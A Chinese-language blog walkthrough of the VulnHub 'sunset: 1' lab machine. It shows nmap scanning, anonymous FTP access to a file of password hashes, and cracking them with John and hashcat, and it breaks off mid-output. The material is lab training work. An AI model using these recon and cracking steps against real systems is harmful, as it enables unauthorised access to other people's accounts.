<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="https://fonts.lug.ustc.edu.cn/css?family=Noto+Serif+SC:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css" integrity="sha256-/4UQcSmErDzPCMAiuOiWPVVsNN2s3ZY/NsmXNcj0IFc=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/themes/blue/pace-theme-minimal.css">
  <script src="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/pace.min.js" integrity="sha256-gqd7YTjg/BtfqWSwsJOvndl0Bxc8gFImLEkXQT8+qj0=" crossorigin="anonymous"></script>

<script class="next-config" data-name="main" type="application/json">{"hostname":"fdlucifer.github.io","root":"/","images":"/images","scheme":"Muse","darkmode":true,"version":"8.15.0","exturl":true,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":true,"style":"mac"},"bookmark":{"enable":true,"color":"#222","save":"auto"},"mediumzoom":true,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":true,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"},"path":"/search.json","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":true,"preload":true}}</script><script src="/js/config.js"></script>

    <meta name="description" content="名称名称：sunset: 1发布日期：2019年7月29日 下载sunset.zip  Download: https:&#x2F;&#x2F;mega.nz&#x2F;#!AGZU1C6J!y_Pc0BEJ2EsAFiBeUY91s4e9mgrlo8sN4aT3wKVen6s Download (Mirror): https:&#x2F;&#x2F;download.vulnhub.com&#x2F;sunset&#x2F;sunset.zip Download">
<meta property="og:type" content="article">
<meta property="og:title" content="vulnhub靶机渗透[sunset-1]">
<meta property="og:url" content="https://fdlucifer.github.io/2020/04/14/sunset-1/index.html">
<meta property="og:site_name" content="fdvoid0&#39;s blog">
<meta property="og:description" content="名称名称：sunset: 1发布日期：2019年7月29日 下载sunset.zip  Download: https:&#x2F;&#x2F;mega.nz&#x2F;#!AGZU1C6J!y_Pc0BEJ2EsAFiBeUY91s4e9mgrlo8sN4aT3wKVen6s Download (Mirror): https:&#x2F;&#x2F;download.vulnhub.com&#x2F;sunset&#x2F;sunset.zip Download">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://raw.githubusercontent.com/wiki/FDlucifer/FDlucifer.github.io/vulnhub255.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/wiki/FDlucifer/FDlucifer.github.io/vulnhub256.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/wiki/FDlucifer/FDlucifer.github.io/haha.jpg">
<meta property="article:published_time" content="2020-04-14T08:04:58.000Z">
<meta property="article:modified_time" content="2020-08-16T16:59:35.621Z">
<meta property="article:author" content="fdvoid0">
<meta property="article:tag" content="vulnhub靶机练习">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/wiki/FDlucifer/FDlucifer.github.io/vulnhub255.jpg">


<link rel="canonical" href="https://fdlucifer.github.io/2020/04/14/sunset-1/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://fdlucifer.github.io/2020/04/14/sunset-1/","path":"2020/04/14/sunset-1/","title":"vulnhub靶机渗透[sunset-1]"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>vulnhub靶机渗透[sunset-1] | fdvoid0's blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<link rel="alternate" href="/atom.xml" title="fdvoid0's blog" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">fdvoid0's blog</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">by fdvoid0</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags<span class="badge">43</span></a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories<span class="badge">46</span></a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives<span class="badge">207</span></a></li><li class="menu-item menu-item-commonweal"><a href="/404/" rel="section"><i class="fa fa-heartbeat fa-fw"></i>Commonweal 404</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%90%8D%E7%A7%B0"><span class="nav-number">1.</span> <span class="nav-text">名称</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%8B%E8%BD%BD"><span class="nav-number">2.</span> <span class="nav-text">下载</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%8F%8F%E8%BF%B0"><span class="nav-number">3.</span> <span class="nav-text">描述</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-number">4.</span> <span class="nav-text">信息收集</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%97%E4%B8%BE"><span class="nav-number">5.</span> <span class="nav-text">列举</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E7%84%B6%E5%90%8E%E8%BF%9B%E4%B8%80%E6%AD%A5%E6%8F%90%E6%9D%83"><span class="nav-number">6.</span> <span class="nav-text">利用然后进一步提权</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9%E6%80%BB%E7%BB%93"><span class="nav-number">7.</span> <span class="nav-text">知识点总结</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="fdvoid0"
      src="/images/blackhole.png">
  <p class="site-author-name" itemprop="name">fdvoid0</p>
  <div class="site-description" itemprop="description">All things about infosec & ctf</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">207</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">46</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">43</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL0ZEbHVjaWZlcg==" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;FDlucifer"><i class="fab fa-github fa-fw"></i>GitHub</span>
      </span>
      <span class="links-of-author-item">
        <span class="exturl" data-url="bWFpbHRvOjExODUxNTE4NjdAcXEuY29t" title="E-Mail → mailto:1185151867@qq.com"><i class="fa fa-envelope fa-fw"></i>E-Mail</span>
      </span>
      <span class="links-of-author-item">
        <span class="exturl" data-url="aHR0cHM6Ly90d2l0dGVyLmNvbS9mZGx1Y2lmZXIxMQ==" title="Twitter → https:&#x2F;&#x2F;twitter.com&#x2F;fdlucifer11"><i class="fab fa-twitter fa-fw"></i>Twitter</span>
      </span>
      <span class="links-of-author-item">
        <span class="exturl" data-url="aHR0cHM6Ly93d3cuZmFjZWJvb2suY29tL3Byb2ZpbGUucGhwP2lkPTEwMDAxOTY5NDUyODYyMA==" title="FB Page → https:&#x2F;&#x2F;www.facebook.com&#x2F;profile.php?id&#x3D;100019694528620"><i class="fab fa-facebook fa-fw"></i>FB Page</span>
      </span>
      <span class="links-of-author-item">
        <span class="exturl" data-url="aHR0cHM6Ly93d3cueW91dHViZS5jb20vY2hhbm5lbC9VQ19saVRlaDRSMUZNYnBWeGxwTWUtdnc=" title="YouTube → https:&#x2F;&#x2F;www.youtube.com&#x2F;channel&#x2F;UC_liTeh4R1FMbpVxlpMe-vw"><i class="fab fa-youtube fa-fw"></i>YouTube</span>
      </span>
      <span class="links-of-author-item">
        <span class="exturl" data-url="aHR0cHM6Ly93d3cuaW5zdGFncmFtLmNvbS95YW5nODkyOS8=" title="Instagram → https:&#x2F;&#x2F;www.instagram.com&#x2F;yang8929&#x2F;"><i class="fab fa-instagram fa-fw"></i>Instagram</span>
      </span>
      <span class="links-of-author-item">
        <span class="exturl" data-url="aHR0cHM6Ly9pbmZvc2VjLmV4Y2hhbmdlL0BsVWMxZjNyMTE=" title="infosec.exchange → https:&#x2F;&#x2F;infosec.exchange&#x2F;@lUc1f3r11"><i class="fa fa-stack-exchange fa-fw"></i>infosec.exchange</span>
      </span>
  </div>
  <div class="cc-license animated" itemprop="license">
    <span class="exturl cc-opacity" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><img src="https://cdnjs.cloudflare.com/ajax/libs/creativecommons-vocabulary/2020.11.3/assets/license_badges/big/by_nc_sa.svg" alt="Creative Commons"></span>
  </div>

        </div>
      </div>
        <div class="back-to-top animated" role="button" aria-label="Back to top">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
    </div>

    
    <div class="sidebar-inner sidebar-blogroll">
      <div class="links-of-blogroll animated">
        <div class="links-of-blogroll-title"><i class="fa fa-globe fa-fw"></i>
          Links
        </div>
        <ul class="links-of-blogroll-list">
            <li class="links-of-blogroll-item">
              <span class="exturl" data-url="aHR0cHM6Ly9hdHN1ZDAubWUv" title="https:&#x2F;&#x2F;atsud0.me&#x2F;">atsud0</span>
            </li>
            <li class="links-of-blogroll-item">
              <span class="exturl" data-url="aHR0cHM6Ly9kcm9pZGthbGkuZ2l0aHViLmlvLw==" title="https:&#x2F;&#x2F;droidkali.github.io&#x2F;">记忆里的纯真</span>
            </li>
            <li class="links-of-blogroll-item">
              <span class="exturl" data-url="aHR0cHM6Ly94aWFvbGltYXJzLndvcmRwcmVzcy5jb20v" title="https:&#x2F;&#x2F;xiaolimars.wordpress.com&#x2F;">小离</span>
            </li>
        </ul>
      </div>
    </div>
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://fdlucifer.github.io/2020/04/14/sunset-1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/blackhole.png">
      <meta itemprop="name" content="fdvoid0">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="fdvoid0's blog">
      <meta itemprop="description" content="All things about infosec & ctf">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="vulnhub靶机渗透[sunset-1] | fdvoid0's blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          vulnhub靶机渗透[sunset-1]
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2020-04-14 16:04:58" itemprop="dateCreated datePublished" datetime="2020-04-14T16:04:58+08:00">2020-04-14</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2020-08-17 00:59:35" itemprop="dateModified" datetime="2020-08-17T00:59:35+08:00">2020-08-17</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/vulnhub-walkthrough/" itemprop="url" rel="index"><span itemprop="name">vulnhub walkthrough</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="Views" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">Views: </span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="Word count in article">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">Word count in article: </span>
      <span>1.8k</span>
    </span>
    <span class="post-meta-item" title="Reading time">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">Reading time &asymp;</span>
      <span>7 mins.</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h3 id="名称"><a href="#名称" class="headerlink" title="名称"></a>名称</h3><p>名称：sunset: 1<br>发布日期：2019年7月29日</p>
<h3 id="下载"><a href="#下载" class="headerlink" title="下载"></a>下载</h3><p>sunset.zip</p>
<ul>
<li>Download: <span class="exturl" data-url="aHR0cHM6Ly9tZWdhLm56LyMhQUdaVTFDNkoheV9QYzBCRUoyRXNBRmlCZVVZOTFzNGU5bWdybG84c040YVQzd0tWZW42cw==">https://mega.nz/#!AGZU1C6J!y_Pc0BEJ2EsAFiBeUY91s4e9mgrlo8sN4aT3wKVen6s<i class="fa fa-external-link-alt"></i></span></li>
<li>Download (Mirror): <span class="exturl" data-url="aHR0cHM6Ly9kb3dubG9hZC52dWxuaHViLmNvbS9zdW5zZXQvc3Vuc2V0LnppcA==">https://download.vulnhub.com/sunset/sunset.zip<i class="fa fa-external-link-alt"></i></span></li>
<li>Download (Torrent): <span class="exturl" data-url="aHR0cHM6Ly9kb3dubG9hZC52dWxuaHViLmNvbS9zdW5zZXQvc3Vuc2V0LnppcC50b3JyZW50">https://download.vulnhub.com/sunset/sunset.zip.torrent<i class="fa fa-external-link-alt"></i></span></li>
</ul>
<span id="more"></span>

<h3 id="描述"><a href="#描述" class="headerlink" title="描述"></a>描述</h3><p>N&#x2F;A</p>
<h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h3><p>上nmap</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~<span class="comment"># nmap -sn -v 192.168.56.*</span></span><br><span class="line">Nmap scan report <span class="keyword">for</span> 192.168.56.123</span><br><span class="line">Host is up (0.00016s latency).</span><br><span class="line">MAC Address: 08:00:27:89:F0:14 (Oracle VirtualBox virtual NIC)</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~<span class="comment"># nmap -v -p- -sV 192.168.56.123</span></span><br><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line">21/tcp open  ftp     pyftpdlib 1.5.5</span><br><span class="line">22/tcp open  ssh     OpenSSH 7.9p1 Debian 10 (protocol 2.0)</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~<span class="comment"># nmap -p 21,22 -v -A -T4 --script=vuln 192.168.56.123</span></span><br><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line">21/tcp open  ftp     pyftpdlib 1.5.5</span><br><span class="line">|_clamav-<span class="built_in">exec</span>: ERROR: Script execution failed (use -d to debug)</span><br><span class="line">|_sslv2-drown: </span><br><span class="line">22/tcp open  ssh     OpenSSH 7.9p1 Debian 10 (protocol 2.0)</span><br><span class="line">|_clamav-<span class="built_in">exec</span>: ERROR: Script execution failed (use -d to debug)</span><br></pre></td></tr></table></figure>

<p>通过尝试发现可以通过anonymous用户登录ftp</p>
<h3 id="列举"><a href="#列举" class="headerlink" title="列举"></a>列举</h3><p>不出所料，尝试使用匿名用户登录ftp，并成功完成了此操作，此后在那里获得了一个名为“ backup”的文件。首先将该文件保存在系统中，然后打开该文件并得到五个用户的哈希值。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~/vulnhub/sunset<span class="comment"># ftp 192.168.56.123</span></span><br><span class="line">Connected to 192.168.56.123.</span><br><span class="line">220 pyftpdlib 1.5.5 ready.</span><br><span class="line">Name (192.168.56.123:root): anonymous</span><br><span class="line">331 Username ok, send password.</span><br><span class="line">Password:</span><br><span class="line">230 Login successful.</span><br><span class="line">Remote system <span class="built_in">type</span> is UNIX.</span><br><span class="line">Using binary mode to transfer files.</span><br><span class="line">ftp&gt; <span class="built_in">ls</span></span><br><span class="line">200 Active data connection established.</span><br><span class="line">125 Data connection already open. Transfer starting.</span><br><span class="line">-rw-r--r--   1 root     root         1062 Jul 29  2019 backup</span><br><span class="line">226 Transfer complete.</span><br><span class="line">ftp&gt; get backup</span><br><span class="line"><span class="built_in">local</span>: backup remote: backup</span><br><span class="line">200 Active data connection established.</span><br><span class="line">125 Data connection already open. Transfer starting.</span><br><span class="line">226 Transfer complete.</span><br><span class="line">1062 bytes received <span class="keyword">in</span> 0.01 secs (135.0579 kB/s)</span><br><span class="line">ftp&gt; quit</span><br><span class="line">221 Goodbye.</span><br><span class="line">root@kali:~/vulnhub/sunset<span class="comment"># ls</span></span><br><span class="line">backup</span><br><span class="line">root@kali:~/vulnhub/sunset<span class="comment"># cat backup </span></span><br><span class="line">CREDENTIALS:                                                                                                                                                                                                       </span><br><span class="line">office:$6$<span class="variable">$9ZYTy</span>.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCr/avWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X.                                                                                                                  </span><br><span class="line">datacenter:$6$<span class="variable">$3QW</span>/J4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ/6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/                                                                                                              </span><br><span class="line">sky:$6$<span class="variable">$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo</span>.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0                                                                                                                     </span><br><span class="line">sunset:$6<span class="variable">$406THujdibTNu</span>./R<span class="variable">$NzquK0QRsbAUUSrHcpR2QrrlU3fA</span>/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/</span><br><span class="line">space:$6$<span class="variable">$4NccGQWPfiyfGKHgyhJBgiadOlP</span>/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/</span><br></pre></td></tr></table></figure>

<p>复制这些hash并将其保存在名为hash的文件中，然后将在crack工具john的帮助下破解用户“sunset”找到密码“ cheer14”的hash。下一步使用此用户名和密码通过ssh连接。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~/vulnhub/sunset<span class="comment"># john hash</span></span><br><span class="line">Warning: detected <span class="built_in">hash</span> <span class="built_in">type</span> <span class="string">&quot;HMAC-SHA256&quot;</span>, but the string is also recognized as <span class="string">&quot;HMAC-SHA512&quot;</span></span><br><span class="line">Use the <span class="string">&quot;--format=HMAC-SHA512&quot;</span> option to force loading these as that <span class="built_in">type</span> instead</span><br><span class="line">Warning: only loading hashes of <span class="built_in">type</span> <span class="string">&quot;HMAC-SHA256&quot;</span>, but also saw <span class="built_in">type</span> <span class="string">&quot;sha512crypt&quot;</span></span><br><span class="line">Use the <span class="string">&quot;--format=sha512crypt&quot;</span> option to force loading hashes of that <span class="built_in">type</span> instead</span><br><span class="line">Using default input encoding: UTF-8</span><br><span class="line">Loaded 2 password hashes with 2 different salts (HMAC-SHA256 [password is key, SHA256 256/256 AVX2 8x])</span><br><span class="line">Will run 4 OpenMP threads</span><br><span class="line">Proceeding with single, rules:Single</span><br><span class="line">Press <span class="string">&#x27;q&#x27;</span> or Ctrl-C to abort, almost any other key <span class="keyword">for</span> status</span><br><span class="line">Warning: Only 10 candidates buffered <span class="keyword">for</span> the current salt, minimum 32 needed <span class="keyword">for</span> performance.</span><br><span class="line">Warning: Only 11 candidates buffered <span class="keyword">for</span> the current salt, minimum 32 needed <span class="keyword">for</span> performance.</span><br><span class="line">Warning: Only 29 candidates buffered <span class="keyword">for</span> the current salt, minimum 32 needed <span class="keyword">for</span> performance.</span><br><span class="line">Warning: Only 20 candidates buffered <span class="keyword">for</span> the current salt, minimum 32 needed <span class="keyword">for</span> performance.</span><br><span class="line">Warning: Only 26 candidates buffered <span class="keyword">for</span> the current salt, minimum 32 needed <span class="keyword">for</span> performance.</span><br><span class="line">Warning: Only 29 candidates buffered <span class="keyword">for</span> the current salt, minimum 32 needed <span class="keyword">for</span> performance.</span><br><span class="line">Warning: Only 8 candidates buffered <span class="keyword">for</span> the current salt, minimum 32 needed <span class="keyword">for</span> performance.</span><br><span class="line">Warning: Only 16 candidates buffered <span class="keyword">for</span> the current salt, minimum 32 needed <span class="keyword">for</span> performance.</span><br><span class="line">Warning: Only 31 candidates buffered <span class="keyword">for</span> the current salt, minimum 32 needed <span class="keyword">for</span> performance.</span><br><span class="line">Almost <span class="keyword">done</span>: Processing the remaining buffered candidate passwords, <span class="keyword">if</span> any.</span><br><span class="line">Warning: Only 15 candidates buffered <span class="keyword">for</span> the current salt, minimum 32 needed <span class="keyword">for</span> performance.</span><br><span class="line">Further messages of this <span class="built_in">type</span> will be suppressed.</span><br><span class="line">To see less of these warnings, <span class="built_in">enable</span> <span class="string">&#x27;RelaxKPCWarningCheck&#x27;</span> <span class="keyword">in</span> john.conf</span><br><span class="line">Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist</span><br><span class="line">Proceeding with incremental:ASCII</span><br></pre></td></tr></table></figure>

<p>john太慢，半天出不了结果，如果电脑显卡配置好的话，可以如下选用rockyou.txt字典并使用hashcat来破解密码</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br></pre></td><td class="code"><pre><span class="line">D:\hashcat-5.1.0\hashcat-5.1.0&gt;hashcat64.exe -a 0 -m 1800 password.txt rockyou.txt</span><br><span class="line">hashcat (v5.1.0) starting...</span><br><span class="line"></span><br><span class="line">* Device <span class="comment">#1: WARNING! Kernel exec timeout is not disabled.</span></span><br><span class="line">             This may cause <span class="string">&quot;CL_OUT_OF_RESOURCES&quot;</span> or related errors.</span><br><span class="line">             To <span class="built_in">disable</span> the <span class="built_in">timeout</span>, see: https://hashcat.net/q/timeoutpatch</span><br><span class="line">* Device <span class="comment">#2: Intel&#x27;s OpenCL runtime (GPU only) is currently broken.</span></span><br><span class="line">             We are waiting <span class="keyword">for</span> updated OpenCL drivers from Intel.</span><br><span class="line">             You can use --force to override, but <span class="keyword">do</span> not report 